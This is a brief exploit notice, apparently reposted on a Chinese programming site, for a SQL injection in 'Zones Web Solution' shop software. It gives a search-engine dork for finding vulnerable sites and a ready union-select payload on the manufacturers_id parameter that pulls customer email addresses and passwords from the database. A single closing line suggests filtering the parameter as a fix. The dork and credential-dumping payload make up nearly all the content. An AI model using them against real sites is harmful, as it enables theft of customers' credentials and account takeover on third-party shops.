AuTh0r : Ehsan_Hp200
## Vendor : http://www.zones.in/
##
## Persian Gulf 4 Ever!
Dork : "Powered By : Zones Web Solution" "inurl:index.php?manufacturers_id='"
Exploite:
www.2cto.com /index.php?manufacturers_id=-1 union select concat(customers_email_address,0x3a,customers_password) from customers
修复:过滤index.php页面manufacturers_id参数输入
查看更多关于Zones Web Solution (index.php?manufacturers_id)远程注的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11687